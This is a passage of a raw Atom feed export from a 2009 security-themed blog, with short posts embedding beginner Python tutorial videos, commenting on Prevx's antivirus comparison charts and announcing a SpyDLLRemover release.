&lt;a style="color: rgb(51, 51, 255);" href="http://www.linkedin.com/groupsDirectory?results=&amp;amp;sik=1256086479420&amp;amp;pplSearchOrigin=GLHD&amp;amp;keywords=malware+intelligence"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1787525938094465273?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1787525938094465273/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1787525938094465273' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1787525938094465273'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1787525938094465273'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/malware-intelligence-linkedin-group.html' title='Malware Intelligence Linkedin Group'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Ppq0fEGkHo4/StsuGd4Cz8I/AAAAAAAAB3U/dlNkKgFe75U/s72-c/malware-intelligence-blog.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-4139282961294490289</id><published>2009-11-01T12:22:00.001-11:00</published><updated>2009-11-01T12:23:26.226-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 10 - Slicing</title><content type='html'>&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_IySULAqE_k&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/_IySULAqE_k&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Thank you for checking out EvilFingers Blog.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-4139282961294490289?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/4139282961294490289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=4139282961294490289' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4139282961294490289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4139282961294490289'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/buckys-python-programming-tutorial-10.html' title='Bucky&apos;s Python Programming Tutorial - 10 - Slicing'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3867188807488563745</id><published>2009-10-31T12:38:00.001-11:00</published><updated>2009-10-31T12:39:55.881-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 9 - Sequences and Lists</title><content type='html'>Now that we have come this far, Bucky is now training on Python Sequence and Lists.&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/XWQ0cyCrY7w&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/XWQ0cyCrY7w&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3867188807488563745?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3867188807488563745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3867188807488563745' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3867188807488563745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3867188807488563745'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-9.html' title='Bucky&apos;s Python Programming Tutorial - 9 - Sequences and Lists'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3804992551520502800</id><published>2009-10-31T06:59:00.001-11:00</published><updated>2009-10-31T07:01:49.489-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 8 - Raw Input</title><content type='html'>Video on Python Raw Input:&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/qsTdaxahTsM&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/qsTdaxahTsM&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Enjoy the show!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3804992551520502800?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3804992551520502800/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3804992551520502800' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3804992551520502800'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3804992551520502800'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-8.html' title='Bucky&apos;s Python Programming Tutorial - 8 - Raw Input'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6794217317243651801</id><published>2009-10-31T06:21:00.003-11:00</published><updated>2009-10-31T06:53:46.291-11:00</updated><title type='text'>Prevx -  PC &amp; Internet Security</title><content type='html'>Prevx - PC and Internet Security for Home &amp; Families, Businesses, Enterprises, Banks, Financial, eCommerce, and their customers.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gJDtaXmerr4/SuxzPi36BpI/AAAAAAAAAWw/9JaVqPEq_lE/s1600-h/Prevx_1257009504406.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 155px;" src="http://3.bp.blogspot.com/_gJDtaXmerr4/SuxzPi36BpI/AAAAAAAAAWw/9JaVqPEq_lE/s320/Prevx_1257009504406.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398816764206909074" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Prevx does a great comparison of Anti-Virus vendors by showing the malwares &amp; other that were failed to be detected by AV tools.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/SuxzQTcwO2I/AAAAAAAAAXA/bsCbyvDL6wo/s1600-h/Prevx_1257009666515.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 155px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/SuxzQTcwO2I/AAAAAAAAAXA/bsCbyvDL6wo/s320/Prevx_1257009666515.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398816777246358370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Products &amp; Services they offer:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/SuxzP32wZ9I/AAAAAAAAAW4/4l0KROKJxTE/s1600-h/Prevx_1257009646570.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 155px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/SuxzP32wZ9I/AAAAAAAAAW4/4l0KROKJxTE/s320/Prevx_1257009646570.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398816769839228882" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The reason for us talking about Prevx here is because, it would have been a totally new business model for 2001 when Prevx was originally formed. It is an interesting way to compete AV's openly to say how many detection failures has happened during their tests.&lt;br /&gt;&lt;br /&gt;This could do one of the following:&lt;br /&gt;&lt;br /&gt;(1) Awareness among Prevx viewers:&lt;br /&gt;&lt;br /&gt;People who view this comparison chart get an idea of whats missing in each and they could choose one with minimum misses.&lt;br /&gt;&lt;br /&gt;(2) Buy Prevx tools:&lt;br /&gt;&lt;br /&gt;If Prevx is to the level of finding out what others are lacking, then it generally means that they would make their tools detect stuff, that other tools lack.&lt;br /&gt;&lt;br /&gt;(3) Scares the crap out of AV vendors:&lt;br /&gt;&lt;br /&gt;Well, it is just a possibility that AV vendors might get scared of their public image and try covering their lack of detection by:&lt;br /&gt;&lt;br /&gt;    (a) Paying off reality, to cover their weakness from public exposure.&lt;br /&gt;&lt;br /&gt;    (b) Buying samples/signature or other details of these misses.&lt;br /&gt;&lt;br /&gt;    (c) Working on fixing their tools, without attempting to contact these vendors.&lt;br /&gt;&lt;br /&gt;    But in all the above cases(a,b and c) the AV vendors are always on their toes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is good business, not just in terms of money but also the way they actually directly or indirectly keep the AV vendors aggressive and alert to protect their business from falling off the cliff.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6794217317243651801?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6794217317243651801/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6794217317243651801' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6794217317243651801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6794217317243651801'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/prevx-pc-internet-security.html' title='Prevx -  PC &amp; Internet Security'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gJDtaXmerr4/SuxzPi36BpI/AAAAAAAAAWw/9JaVqPEq_lE/s72-c/Prevx_1257009504406.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5980128191161467223</id><published>2009-10-31T02:40:00.002-11:00</published><updated>2009-10-31T02:45:53.145-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 7 - More on Strings</title><content type='html'>More on strings... strings, strings &amp; strings...&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/LBJWWjDc7wM&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/LBJWWjDc7wM&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Thank you for learning.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5980128191161467223?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5980128191161467223/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5980128191161467223' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5980128191161467223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5980128191161467223'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-7.html' title='Bucky&apos;s Python Programming Tutorial - 7 - More on Strings'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5077119216575789324</id><published>2009-10-31T02:25:00.002-11:00</published><updated>2009-10-31T02:28:51.761-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 6 - Strings</title><content type='html'>Stings and its manipulations on Python. &lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/9v1HcKR39qw&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/9v1HcKR39qw&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;I think we should start calling these videos as the Bucky's series.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5077119216575789324?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5077119216575789324/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5077119216575789324' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5077119216575789324'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5077119216575789324'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-6.html' title='Bucky&apos;s Python Programming Tutorial - 6 - Strings'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1445011836867250935</id><published>2009-10-31T02:24:00.002-11:00</published><updated>2009-10-31T02:29:23.473-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 5 - How to Save Your Programs</title><content type='html'>Having done, what you have done so far: How do you save your stuff?&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-lfWzPxOJQ8&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/-lfWzPxOJQ8&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Enjoy the video!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1445011836867250935?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1445011836867250935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1445011836867250935' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1445011836867250935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1445011836867250935'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-5.html' title='Bucky&apos;s Python Programming Tutorial - 5 - How to Save Your Programs'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-3863752485663124433</id><published>2009-10-31T02:21:00.001-11:00</published><updated>2009-10-31T02:23:21.648-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 4 - Modules and Functions</title><content type='html'>In this video Bucky is talking about functions:&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="340"&gt;&lt;param name="movie" value="http://www.youtube.com/v/y-0lbZGdmIg&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/y-0lbZGdmIg&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Enjoy the show!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-3863752485663124433?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/3863752485663124433/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=3863752485663124433' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3863752485663124433'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/3863752485663124433'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-4.html' title='Bucky&apos;s Python Programming Tutorial - 4 - Modules and Functions'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5481752338798671190</id><published>2009-10-30T18:08:00.002-11:00</published><updated>2009-10-30T18:17:13.652-11:00</updated><title type='text'>SpyDLLRemover v 2.5 - PortableApps.com Release!</title><content type='html'>We are glad that Nagareshwar was able to push out a major release for SpyDLLRemover v2.5, we made it into a great release at &lt;a href="http://www.portableapps.com"&gt;www.PortableApps.com&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/SuvIELrUZJI/AAAAAAAAAWY/NhxkEc2P5B4/s1600-h/spydllremover_portable_app_released.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 125px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/SuvIELrUZJI/AAAAAAAAAWY/NhxkEc2P5B4/s320/spydllremover_portable_app_released.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5398628552513184914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thanks to PortableApps guys and all the users who suggested very valuable update that made us go for our next major release with Win7 and other upgrades. This would be SpyDLLRemover v 3.0. It is under test phase.&lt;br /&gt;&lt;br /&gt;SpyDLLRemover v 3.1 is under planning phase. If you have any features in mind, that you would like to have in SpyDLLRemover, do shoot us an email @ contact.fingers @ gmail.com or leave a comment to this blog. We will definitely consider all entries and respond to the entries even if the chances of implementing it is minimal.&lt;br /&gt;&lt;br /&gt;Thank you for everything guys.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5481752338798671190?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5481752338798671190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5481752338798671190' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5481752338798671190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5481752338798671190'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/spydllremover-v-25-portableappscom.html' title='SpyDLLRemover v 2.5 - PortableApps.com Release!'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gJDtaXmerr4/SuvIELrUZJI/AAAAAAAAAWY/NhxkEc2P5B4/s72-c/spydllremover_portable_app_released.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1769718900121191825</id><published>2009-10-30T17:55:00.002-11:00</published><updated>2009-10-30T17:59:28.483-11:00</updated><title type='text'>EFBlog.net  -  Coming Soon!</title><content type='html'>EFblog.net is the new EvilFingers Blog. Trying to come up with a new look and feel. We need LAMP and CSS guys for UI and Integrity. If you guys wish to contribute for EvilFingers community, feel free to contact us at any point of time.&lt;br /&gt;&lt;br /&gt;Benefits: Knowledge is like fluid, flowing from one to another just like what happens @ EvilFingers. Members share their skills generously, since we believe that the more we share, the more we learn. Do feel free to contact us. &lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1769718900121191825?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1769718900121191825/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1769718900121191825' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1769718900121191825'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1769718900121191825'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/efblognet-coming-soon.html' title='EFBlog.net  -  Coming Soon!'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-7011980712317378746</id><published>2009-10-30T14:08:00.002-11:00</published><updated>2009-10-30T14:10:37.091-11:00</updated><title type='text'>Bucky's Python Programming Tutorial - 3 - Variables</title><content type='html'>Bucky's video on Variables in Python.&lt;br /&gt;&lt;br /&gt;&lt;object width="420" height="295"&gt;&lt;param name="movie" value="http://www.youtube.com/v/667ZeuZ0Q8M&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/667ZeuZ0Q8M&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="420" height="295"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7011980712317378746?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7011980712317378746/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7011980712317378746' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7011980712317378746'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7011980712317378746'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/buckys-python-programming-tutorial-3.html' title='Bucky&apos;s Python Programming Tutorial - 3 - Variables'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1823742780038512551</id><published>2009-10-30T14:02:00.008-11:00</published><updated>2009-10-30T14:07:34.312-11:00</updated><title type='text'>Python Programming Tutorial - 2 - Numbers and Math</title><content type='html'>More into numbers[Integer &amp; float] &amp; math on IDLE interpreter.&lt;br /&gt;&lt;br /&gt;&lt;object width="400" height="295"&gt;&lt;param name="movie" value="http://www.youtube.com/v/YW8jtSOTRAU&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/YW8jtSOTRAU&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="400" height="295"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Thanks for taking your time to check it out.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1823742780038512551?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1823742780038512551/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1823742780038512551' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1823742780038512551'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1823742780038512551'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/python-programming-tutorial-2-numbers.html' title='Python Programming Tutorial - 2 - Numbers and Math'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 